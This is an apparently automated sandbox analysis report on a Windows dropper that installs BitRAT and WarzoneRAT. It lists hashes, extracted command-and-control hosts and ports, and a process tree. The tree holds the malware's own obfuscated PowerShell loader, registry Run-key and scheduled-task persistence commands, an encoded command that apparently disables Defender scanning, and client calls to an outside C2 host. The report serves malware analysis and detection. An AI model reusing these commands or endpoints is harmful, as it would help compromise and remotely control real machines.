bitrat | 3e2465a42ff87f207327dce94ed7ca4f78c070481ebdb42056b4c10f0a65b6e1

Analysis

max time kernel
150s
max time network
43s
platform
windows7_x64
resource
win7-20220812-en
resource tags

arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system
submitted
15-12-2022 13:24

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

ff64fcc6ccbb482ca0bdf539c492555de86bf3666a8f7979c9d052225be0589c.exe
Size

8.8MB
MD5

bd40cd2f9b60a3b24f9a59d39d234374
SHA1

28888c62f7a8a3b7a8fe6213b9fb2a9883c9b1cb
SHA256

ff64fcc6ccbb482ca0bdf539c492555de86bf3666a8f7979c9d052225be0589c
SHA512

c6272bf8ab06fbd0d2e5f7e8488c0c1f686f6bf5ad255762d61f7121bd7148816174366a521a6cbd9be4df1b2d22e6fbea5cbad20bac8ffe9d8445847dbb636b
SSDEEP

196608:LiDSsREt5lLjiCIJMrsSO6YNoxzVwdFnRZmpL2FxrQtyBP:0SsKtfLjjHBB4SpL0rQ

Score

10^/10

bitrat warzonerat infostealer persistence rat trojan

Malware Config

Extracted

Family

warzonerat

cabalfenix.ddns.net:1807

Extracted

Family

bitrat

Version

1.38

cabalfenix.ddns.net:1235

Attributes

communication_password
81dc9bdb52d04dc20036dbd8313ed055
install_dir
$77Install path
install_file
$77Install name
tor_process
tor

Signatures

BitRAT
BitRAT is a remote access tool written in C++ and uses leaked source code from other families.
trojan bitrat
Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs

Processes:

powershell.EXEpowershell.EXE

description pid process target process

PID 1472 created 416 1472 powershell.EXE winlogon.exe
PID 1624 created 416 1624 powershell.EXE winlogon.exe
WarzoneRat, AveMaria
WarzoneRat is a native RAT developed in C++ with multiple plugins sold as a MaaS.
rat infostealer warzonerat
Executes dropped EXE 7 IoCs

Processes:

$77Install.exe$77GoogleUpdate.exe$77WarZone.exe$77BitRat.exe$77icaro.exeYourPhone.exe$77images.exe

pid process

524 $77Install.exe
1560 $77GoogleUpdate.exe
568 $77WarZone.exe
1572 $77BitRat.exe
2008 $77icaro.exe
1276 YourPhone.exe
2112 $77images.exe

description	pid	process	target process
PID 1472 created 416	1472	powershell.EXE	winlogon.exe
PID 1624 created 416	1624	powershell.EXE	winlogon.exe

pid	process
524	$77Install.exe
1560	$77GoogleUpdate.exe
568	$77WarZone.exe
1572	$77BitRat.exe
2008	$77icaro.exe
1276	YourPhone.exe
2112	$77images.exe

Modifies Installed Components in the registry 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

explorer.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Active Setup\Installed Components	explorer.exe

Loads dropped DLL 9 IoCs

Processes:

RegAsm.exe$77WarZone.exe

pid process

1096 RegAsm.exe
1096 RegAsm.exe
1096 RegAsm.exe
1096 RegAsm.exe
1096 RegAsm.exe
1096 RegAsm.exe
1096 RegAsm.exe
568 $77WarZone.exe
568 $77WarZone.exe

pid	process
1096	RegAsm.exe
1096	RegAsm.exe
1096	RegAsm.exe
1096	RegAsm.exe
1096	RegAsm.exe
1096	RegAsm.exe
1096	RegAsm.exe
568	$77WarZone.exe
568	$77WarZone.exe

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

powershell.exe$77BitRat.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Windows\CurrentVersion\Run\$77INJECTOR = "C:\\Users\\Admin\\AppData\\Roaming\\$77INJECTOR\\$77INJECTOR.exe"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Windows\CurrentVersion\Run\$77Install name = "C:\\Users\\Admin\\AppData\\Local\\$77Install path\\$77Install name"	$77BitRat.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Drops file in System32 directory 2 IoCs

Processes:

powershell.EXEpowershell.EXE

description	ioc	process
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE
File opened for modification	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE

Suspicious use of NtSetInformationThreadHideFromDebugger 4 IoCs

Processes:

$77BitRat.exe

pid process

1572 $77BitRat.exe
1572 $77BitRat.exe
1572 $77BitRat.exe
1572 $77BitRat.exe

pid	process
1572	$77BitRat.exe
1572	$77BitRat.exe
1572	$77BitRat.exe
1572	$77BitRat.exe

Suspicious use of SetThreadContext 3 IoCs

Processes:

cmd.exepowershell.EXEpowershell.EXE

description	pid	process	target process
PID 1476 set thread context of 1096	1476	cmd.exe	RegAsm.exe
PID 1472 set thread context of 1196	1472	powershell.EXE	dllhost.exe
PID 1624 set thread context of 2144	1624	powershell.EXE	dllhost.exe

Drops file in Windows directory 1 IoCs

Processes:

$77GoogleUpdate.exe

description ioc process

File created C:\Windows\GoogleUpdate.dll $77GoogleUpdate.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exe

pid process

840 schtasks.exe

description	ioc	process
File created	C:\Windows\GoogleUpdate.dll	$77GoogleUpdate.exe

pid	process
840	schtasks.exe

Modifies data under HKEY_USERS 2 IoCs

Processes:

powershell.EXE

description	ioc	process
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage	powershell.EXE
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = f0df48109110d901	powershell.EXE

Modifies registry class 5 IoCs

Processes:

explorer.exe

description	ioc	process
Set value (data)	\REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots	explorer.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000_Classes\Local Settings	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU	explorer.exe

Modifies system certificate store 2 TTPs 2 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

T1112

Processes:

$77icaro.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436	$77icaro.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436\Blob = 04000000010000001000000079e4a9840d7d3a96d7c04fe2434c892e0f0000000100000014000000b34ddd372ed92e8f2abfbb9e20a9d31f204f194b090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030814000000010000001400000003de503556d14cbb66f0a3e21b1bc397b23dd1550b00000001000000120000004400690067006900430065007200740000001d000000010000001000000059779e39e21a2e3dfced6857ed5c5fd9030000000100000014000000a8985d3a65e5e5c4b2d7d66d40c6dd2fb19c54361900000001000000100000000f3a0527d242de2dc98e5cfcb1e991ee2000000001000000b3030000308203af30820297a0030201020210083be056904246b1a1756ac95991c74a300d06092a864886f70d01010505003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100e23be11172dea8a4d3a357aa50a28f0b7790c9a2a5ee12ce965b010920cc0193a74e30b753f743c46900579de28d22dd870640008109cece1b83bfdfcd3b7146e2d666c705b37627168f7b9e1e957deeb748a308dad6af7a0c3906657f4a5d1fbc17f8abbeee28d7747f7a78995985686e5c23324bbf4ec0e85a6de370bf7710bffc01f685d9a844105832a97518d5d1a2be47e2276af49a33f84908608bd45fb43a84bfa1aa4a4c7d3ecf4f5f6c765ea04b37919edc22e66dce141a8e6acbfecdb3146417c75b299e32bff2eefad30b42d4abb74132da0cd4eff881d5bb8d583fb51be84928a270da3104ddf7b216f24c0a4e07a8ed4a3d5eb57fa390c3af270203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041403de503556d14cbb66f0a3e21b1bc397b23dd155301f0603551d2304183016801403de503556d14cbb66f0a3e21b1bc397b23dd155300d06092a864886f70d01010505000382010100cb9c37aa4813120afadd449c4f52b0f4dfae04f5797908a32418fc4b2b84c02db9d5c7fef4c11f58cbb86d9c7a74e79829ab11b5e370a0a1cd4c8899938c9170e2ab0f1cbe93a9ff63d5e40760d3a3bf9d5b09f1d58ee353f48e63fa3fa7dbb466df6266d6d16e418df22db5ea774a9f9d58e22b59c04023ed2d2882453e7954922698e08048a837eff0d6796016deace80ecd6eac4417382f49dae1453e2ab93653cf3a5006f72ee8c457496c612118d504ad783c2c3a806ba7ebaf1514e9d889c1b9386ce2916c8aff64b977255730c01b24a3e1dce9df477cb5b424080530ec2dbd0bbf45bf50b9a9f3eb980112adc888c698345f8d0a3cc6e9d595956dde	$77icaro.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

cmd.exepowershell.exepowershell.exe$77GoogleUpdate.exe$77icaro.exeYourPhone.exe

pid	process
1476	cmd.exe
1996	powershell.exe
1792	powershell.exe
1560	$77GoogleUpdate.exe
1560	$77GoogleUpdate.exe
1560	$77GoogleUpdate.exe
1560	$77GoogleUpdate.exe
1560	$77GoogleUpdate.exe
2008	$77icaro.exe
1560	$77GoogleUpdate.exe
2008	$77icaro.exe
2008	$77icaro.exe
2008	$77icaro.exe
2008	$77icaro.exe
2008	$77icaro.exe
2008	$77icaro.exe
1560	$77GoogleUpdate.exe
2008	$77icaro.exe
2008	$77icaro.exe
2008	$77icaro.exe
2008	$77icaro.exe
2008	$77icaro.exe
2008	$77icaro.exe
2008	$77icaro.exe
2008	$77icaro.exe
2008	$77icaro.exe
2008	$77icaro.exe
2008	$77icaro.exe
2008	$77icaro.exe
2008	$77icaro.exe
2008	$77icaro.exe
1560	$77GoogleUpdate.exe
1276	YourPhone.exe
1560	$77GoogleUpdate.exe
1560	$77GoogleUpdate.exe
1560	$77GoogleUpdate.exe
1560	$77GoogleUpdate.exe
1276	YourPhone.exe
1276	YourPhone.exe
1560	$77GoogleUpdate.exe
1560	$77GoogleUpdate.exe
1276	YourPhone.exe
1276	YourPhone.exe
1560	$77GoogleUpdate.exe
1560	$77GoogleUpdate.exe
1276	YourPhone.exe
1276	YourPhone.exe
1560	$77GoogleUpdate.exe
1560	$77GoogleUpdate.exe
1276	YourPhone.exe
1276	YourPhone.exe
1560	$77GoogleUpdate.exe
1560	$77GoogleUpdate.exe
1560	$77GoogleUpdate.exe
1276	YourPhone.exe
1276	YourPhone.exe
1560	$77GoogleUpdate.exe
1560	$77GoogleUpdate.exe
1276	YourPhone.exe
1276	YourPhone.exe
1560	$77GoogleUpdate.exe
1560	$77GoogleUpdate.exe
1276	YourPhone.exe
1276	YourPhone.exe

Suspicious use of AdjustPrivilegeToken 37 IoCs

Processes:

cmd.exepowershell.exepowershell.exe$77BitRat.exe$77icaro.exeexplorer.exeYourPhone.exeAUDIODG.EXEpowershell.EXEpowershell.EXEdllhost.exepowershell.exedllhost.exesvchost.exe

description	pid	process
Token: SeDebugPrivilege	1476	cmd.exe
Token: SeDebugPrivilege	1996	powershell.exe
Token: SeDebugPrivilege	1792	powershell.exe
Token: SeDebugPrivilege	1572	$77BitRat.exe
Token: SeShutdownPrivilege	1572	$77BitRat.exe
Token: SeDebugPrivilege	2008	$77icaro.exe
Token: SeShutdownPrivilege	1940	explorer.exe
Token: SeDebugPrivilege	1276	YourPhone.exe
Token: SeShutdownPrivilege	1940	explorer.exe
Token: SeShutdownPrivilege	1940	explorer.exe
Token: SeShutdownPrivilege	1940	explorer.exe
Token: SeShutdownPrivilege	1940	explorer.exe
Token: SeShutdownPrivilege	1940	explorer.exe
Token: SeShutdownPrivilege	1940	explorer.exe
Token: SeShutdownPrivilege	1940	explorer.exe
Token: 33	1392	AUDIODG.EXE
Token: SeIncBasePriorityPrivilege	1392	AUDIODG.EXE
Token: 33	1392	AUDIODG.EXE
Token: SeIncBasePriorityPrivilege	1392	AUDIODG.EXE
Token: SeShutdownPrivilege	1940	explorer.exe
Token: SeShutdownPrivilege	1940	explorer.exe
Token: SeDebugPrivilege	1472	powershell.EXE
Token: SeDebugPrivilege	1624	powershell.EXE
Token: SeDebugPrivilege	1472	powershell.EXE
Token: SeDebugPrivilege	1196	dllhost.exe
Token: SeShutdownPrivilege	1940	explorer.exe
Token: SeDebugPrivilege	1624	powershell.EXE
Token: SeDebugPrivilege	1636	powershell.exe
Token: SeDebugPrivilege	2144	dllhost.exe
Token: SeAssignPrimaryTokenPrivilege	872	svchost.exe
Token: SeIncreaseQuotaPrivilege	872	svchost.exe
Token: SeSecurityPrivilege	872	svchost.exe
Token: SeTakeOwnershipPrivilege	872	svchost.exe
Token: SeLoadDriverPrivilege	872	svchost.exe
Token: SeRestorePrivilege	872	svchost.exe
Token: SeSystemEnvironmentPrivilege	872	svchost.exe
Token: SeShutdownPrivilege	1940	explorer.exe

Suspicious use of FindShellTrayWindow 26 IoCs

Processes:

explorer.exe

pid	process
1940	explorer.exe
1940	explorer.exe
1940	explorer.exe
1940	explorer.exe
1940	explorer.exe
1940	explorer.exe
1940	explorer.exe
1940	explorer.exe
1940	explorer.exe
1940	explorer.exe
1940	explorer.exe
1940	explorer.exe
1940	explorer.exe
1940	explorer.exe
1940	explorer.exe
1940	explorer.exe
1940	explorer.exe
1940	explorer.exe
1940	explorer.exe
1940	explorer.exe
1940	explorer.exe
1940	explorer.exe
1940	explorer.exe
1940	explorer.exe
1940	explorer.exe
1940	explorer.exe

Suspicious use of SendNotifyMessage 17 IoCs

Processes:

explorer.exe

pid	process
1940	explorer.exe
1940	explorer.exe
1940	explorer.exe
1940	explorer.exe
1940	explorer.exe
1940	explorer.exe
1940	explorer.exe
1940	explorer.exe
1940	explorer.exe
1940	explorer.exe
1940	explorer.exe
1940	explorer.exe
1940	explorer.exe
1940	explorer.exe
1940	explorer.exe
1940	explorer.exe
1940	explorer.exe

Suspicious use of SetWindowsHookEx 2 IoCs

Processes:

$77BitRat.exe

pid process

1572 $77BitRat.exe
1572 $77BitRat.exe
Suspicious use of UnmapMainImage 2 IoCs

Processes:

svchost.exe

pid process

800 svchost.exe
800 svchost.exe

pid	process
1572	$77BitRat.exe
1572	$77BitRat.exe

pid	process
800	svchost.exe
800	svchost.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

ff64fcc6ccbb482ca0bdf539c492555de86bf3666a8f7979c9d052225be0589c.execmd.execmd.exeRegAsm.exetaskeng.exe

description	pid	process	target process
PID 1476 wrote to memory of 1996	1476	ff64fcc6ccbb482ca0bdf539c492555de86bf3666a8f7979c9d052225be0589c.exe	powershell.exe
PID 1476 wrote to memory of 1996	1476	ff64fcc6ccbb482ca0bdf539c492555de86bf3666a8f7979c9d052225be0589c.exe	powershell.exe
PID 1476 wrote to memory of 1996	1476	ff64fcc6ccbb482ca0bdf539c492555de86bf3666a8f7979c9d052225be0589c.exe	powershell.exe
PID 1476 wrote to memory of 1996	1476	ff64fcc6ccbb482ca0bdf539c492555de86bf3666a8f7979c9d052225be0589c.exe	powershell.exe
PID 1476 wrote to memory of 604	1476	ff64fcc6ccbb482ca0bdf539c492555de86bf3666a8f7979c9d052225be0589c.exe	cmd.exe
PID 1476 wrote to memory of 604	1476	ff64fcc6ccbb482ca0bdf539c492555de86bf3666a8f7979c9d052225be0589c.exe	cmd.exe
PID 1476 wrote to memory of 604	1476	ff64fcc6ccbb482ca0bdf539c492555de86bf3666a8f7979c9d052225be0589c.exe	cmd.exe
PID 1476 wrote to memory of 604	1476	ff64fcc6ccbb482ca0bdf539c492555de86bf3666a8f7979c9d052225be0589c.exe	cmd.exe
PID 604 wrote to memory of 840	604	cmd.exe	schtasks.exe
PID 604 wrote to memory of 840	604	cmd.exe	schtasks.exe
PID 604 wrote to memory of 840	604	cmd.exe	schtasks.exe
PID 604 wrote to memory of 840	604	cmd.exe	schtasks.exe
PID 1476 wrote to memory of 1452	1476	cmd.exe	RegAsm.exe
PID 1476 wrote to memory of 1452	1476	cmd.exe	RegAsm.exe
PID 1476 wrote to memory of 1452	1476	cmd.exe	RegAsm.exe
PID 1476 wrote to memory of 1452	1476	cmd.exe	RegAsm.exe
PID 1476 wrote to memory of 1452	1476	cmd.exe	RegAsm.exe
PID 1476 wrote to memory of 1452	1476	cmd.exe	RegAsm.exe
PID 1476 wrote to memory of 1452	1476	cmd.exe	RegAsm.exe
PID 1476 wrote to memory of 1096	1476	cmd.exe	RegAsm.exe
PID 1476 wrote to memory of 1096	1476	cmd.exe	RegAsm.exe
PID 1476 wrote to memory of 1096	1476	cmd.exe	RegAsm.exe
PID 1476 wrote to memory of 1096	1476	cmd.exe	RegAsm.exe
PID 1476 wrote to memory of 1096	1476	cmd.exe	RegAsm.exe
PID 1476 wrote to memory of 1096	1476	cmd.exe	RegAsm.exe
PID 1476 wrote to memory of 1096	1476	cmd.exe	RegAsm.exe
PID 1476 wrote to memory of 1096	1476	cmd.exe	RegAsm.exe
PID 1476 wrote to memory of 1096	1476	cmd.exe	RegAsm.exe
PID 1476 wrote to memory of 1096	1476	cmd.exe	RegAsm.exe
PID 1476 wrote to memory of 1096	1476	cmd.exe	RegAsm.exe
PID 1476 wrote to memory of 1096	1476	cmd.exe	RegAsm.exe
PID 1096 wrote to memory of 1792	1096	RegAsm.exe	powershell.exe
PID 1096 wrote to memory of 1792	1096	RegAsm.exe	powershell.exe
PID 1096 wrote to memory of 1792	1096	RegAsm.exe	powershell.exe
PID 1096 wrote to memory of 1792	1096	RegAsm.exe	powershell.exe
PID 1096 wrote to memory of 524	1096	RegAsm.exe	$77Install.exe
PID 1096 wrote to memory of 524	1096	RegAsm.exe	$77Install.exe
PID 1096 wrote to memory of 524	1096	RegAsm.exe	$77Install.exe
PID 1096 wrote to memory of 524	1096	RegAsm.exe	$77Install.exe
PID 1096 wrote to memory of 524	1096	RegAsm.exe	$77Install.exe
PID 1096 wrote to memory of 524	1096	RegAsm.exe	$77Install.exe
PID 1096 wrote to memory of 524	1096	RegAsm.exe	$77Install.exe
PID 1096 wrote to memory of 1560	1096	RegAsm.exe	$77GoogleUpdate.exe
PID 1096 wrote to memory of 1560	1096	RegAsm.exe	$77GoogleUpdate.exe
PID 1096 wrote to memory of 1560	1096	RegAsm.exe	$77GoogleUpdate.exe
PID 1096 wrote to memory of 1560	1096	RegAsm.exe	$77GoogleUpdate.exe
PID 1096 wrote to memory of 1560	1096	RegAsm.exe	$77GoogleUpdate.exe
PID 1096 wrote to memory of 1560	1096	RegAsm.exe	$77GoogleUpdate.exe
PID 1096 wrote to memory of 1560	1096	RegAsm.exe	$77GoogleUpdate.exe
PID 1096 wrote to memory of 568	1096	RegAsm.exe	$77WarZone.exe
PID 1096 wrote to memory of 568	1096	RegAsm.exe	$77WarZone.exe
PID 1096 wrote to memory of 568	1096	RegAsm.exe	$77WarZone.exe
PID 1096 wrote to memory of 568	1096	RegAsm.exe	$77WarZone.exe
PID 1096 wrote to memory of 1572	1096	RegAsm.exe	$77BitRat.exe
PID 1096 wrote to memory of 1572	1096	RegAsm.exe	$77BitRat.exe
PID 1096 wrote to memory of 1572	1096	RegAsm.exe	$77BitRat.exe
PID 1096 wrote to memory of 1572	1096	RegAsm.exe	$77BitRat.exe
PID 1096 wrote to memory of 2008	1096	RegAsm.exe	$77icaro.exe
PID 1096 wrote to memory of 2008	1096	RegAsm.exe	$77icaro.exe
PID 1096 wrote to memory of 2008	1096	RegAsm.exe	$77icaro.exe
PID 1096 wrote to memory of 2008	1096	RegAsm.exe	$77icaro.exe
PID 2040 wrote to memory of 1472	2040	taskeng.exe	powershell.EXE
PID 2040 wrote to memory of 1472	2040	taskeng.exe	powershell.EXE
PID 2040 wrote to memory of 1472	2040	taskeng.exe	powershell.EXE

C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
1⤵
PID:476

C:\Windows\system32\services.exe
C:\Windows\system32\services.exe
1⤵
PID:460

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted
2⤵
- Suspicious use of UnmapMainImage
PID:800

C:\Windows\system32\Dwm.exe
"C:\Windows\system32\Dwm.exe"
3⤵
PID:1256

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:872

\\?\C:\Windows\system32\wbem\WMIADAP.EXE
wmiadap.exe /F /T /R
3⤵
PID:1872

C:\Windows\system32\taskeng.exe
taskeng.exe {A99EE01B-E8FC-40AC-BFAA-FB04EFD10345} S-1-5-18:NT AUTHORITY\System:Service:
3⤵
- Suspicious use of WriteProcessMemory
PID:2040

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+'O'+''+[Char](70)+''+[Char](84)+''+[Char](87)+'A'+'R'+'E').GetValue(''+'$'+''+[Char](55)+''+'7'+'s'+[Char](116)+''+[Char](97)+''+[Char](103)+''+[Char](101)+''+'r'+'')).EntryPoint.Invoke($Null,$Null)
4⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:1472

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE "[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+[Char](79)+''+[Char](70)+'TW'+'A'+'R'+[Char](69)+'').GetValue(''+'$'+''+[Char](55)+''+[Char](55)+''+[Char](115)+''+'t'+''+'a'+''+[Char](103)+'e'+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)
4⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
PID:1624

C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
2⤵
PID:296

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation
2⤵
PID:792

C:\Windows\system32\sppsvc.exe
C:\Windows\system32\sppsvc.exe
2⤵
PID:1128

C:\Windows\system32\taskhost.exe
"taskhost.exe"
2⤵
PID:1168

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork
2⤵
PID:1036

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService
2⤵
PID:340

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService
2⤵
PID:832

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
2⤵
PID:744

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0xc4
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1392

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k RPCSS
2⤵
PID:652

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch
2⤵
PID:576

C:\Windows\system32\winlogon.exe
winlogon.exe
1⤵
PID:416

C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{28133f46-3ead-466c-9f65-412012f4dd54}
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1196

C:\Windows\SysWOW64\dllhost.exe
C:\Windows\SysWOW64\dllhost.exe /Processid:{900f862d-3775-444b-a619-2e15ccffe35b}
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2144

C:\Windows\system32\lsm.exe
C:\Windows\system32\lsm.exe
1⤵
PID:484

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
PID:1340

C:\Users\Admin\AppData\Local\Temp\ff64fcc6ccbb482ca0bdf539c492555de86bf3666a8f7979c9d052225be0589c.exe
"C:\Users\Admin\AppData\Local\Temp\ff64fcc6ccbb482ca0bdf539c492555de86bf3666a8f7979c9d052225be0589c.exe"
2⤵
- Suspicious use of WriteProcessMemory
PID:1476

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Remove -ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name '$77INJECTOR';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name '$77INJECTOR' -Value '"C:\Users\Admin\AppData\Roaming\$77INJECTOR\$77INJECTOR.exe"' -PropertyType 'String'
3⤵
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1996

C:\Windows\SysWOW64\cmd.exe
"cmd" /C schtasks /create /tn \$77INJECTOR /tr "C:\Users\Admin\AppData\Roaming\$77INJECTOR\$77INJECTOR.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f
3⤵
- Suspicious use of WriteProcessMemory
PID:604

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /tn \$77INJECTOR /tr "C:\Users\Admin\AppData\Roaming\$77INJECTOR\$77INJECTOR.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f
4⤵
- Creates scheduled task(s)
PID:840

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
#cmd
3⤵
PID:1452

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
#cmd
3⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1096

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAYgB2ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG0AaQBuACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHIAdwBhACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHMAZwBuACMAPgA="
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1792

C:\Users\Admin\AppData\Local\Temp\$77Install.exe
"C:\Users\Admin\AppData\Local\Temp\$77Install.exe"
4⤵
- Executes dropped EXE
PID:524

C:\Users\Admin\AppData\Local\Temp\$77GoogleUpdate.exe
"C:\Users\Admin\AppData\Local\Temp\$77GoogleUpdate.exe"
4⤵
- Executes dropped EXE
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
PID:1560

C:\Users\Admin\AppData\Local\Temp\$77icaro.exe
"C:\Users\Admin\AppData\Local\Temp\$77icaro.exe"
4⤵
- Executes dropped EXE
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2008

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\y1w52pwx\y1w52pwx.cmdline"
5⤵
PID:1580

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES4AE6.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC4F38E3090E14B7DAF50D563E36023E6.TMP"
6⤵
PID:1348

C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" ICARUS_Client cabalfenix.ddns.net 8880 PUGlcQLxe
5⤵
PID:2020

C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" ICARUS_Client cabalfenix.ddns.net 8880 PUGlcQLxe
5⤵
PID:1196

C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
